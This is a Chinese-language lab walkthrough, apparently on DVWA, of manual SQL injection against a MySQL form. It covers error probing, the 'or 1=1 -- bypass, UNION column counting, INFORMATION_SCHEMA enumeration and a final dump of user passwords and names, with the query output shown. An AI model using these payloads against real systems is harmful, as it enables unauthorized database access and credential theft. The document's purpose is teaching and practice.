1.在submit左边的文本框中输入特殊字符‘ ‘ ’,之后报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
可以推测存在注入漏洞,并且知道后台数据库是MYSQL。
2.假设后台的查询语句可能是:select 列 from 表 where ID=? ,如果在语句后面加上 or 1=1,看看效果,但是还是会报错。同上
3.或许注释掉SQL后面部分的语句能够结局这样的问题。所以可以尝试输入'or 1=1 --',结果如下图:
4.下面使用union获取更多的信息,首先'union select 1,--'之后结果如下图:
5.再输入'union select 1,2 --',结果如下图:
6.分别输入union select 1 --和union select 1,2,3 --都会报错:
The used SELECT statements have a different number of columns
可以猜测该表为两列
7.接下来输入:'union select 1, table_name from INFORMATION_SCHEMA.tables --',结果如下:
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: CHARACTER_SETS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLLATIONS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLLATION_CHARACTER_SET_APPLICABILITY
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLUMNS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLUMN_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: ENGINES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: EVENTS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: FILES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: GLOBAL_STATUS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: GLOBAL_VARIABLES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: KEY_COLUMN_USAGE
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PARTITIONS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PLUGINS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PROCESSLIST
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PROFILING
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: REFERENTIAL_CONSTRAINTS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: ROUTINES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SCHEMATA
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SCHEMA_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SESSION_STATUS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SESSION_VARIABLES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: STATISTICS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLE_CONSTRAINTS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLE_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TRIGGERS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: USER_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: VIEWS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: guestbook
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: users
8.最后两个应该是要使用的表guestbook和users
9.输入:'UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = 'users' -- '
结果如图列出来所有的列名:
11.输入'union select NULL,password from users -- ',获取密码,结果如下图:
12.最后使用concat函数列出所有列的信息:
'union select password,concat(first_name,' ',last_name,' ',user) from users -- ',结果如下图:
ok,打完收工。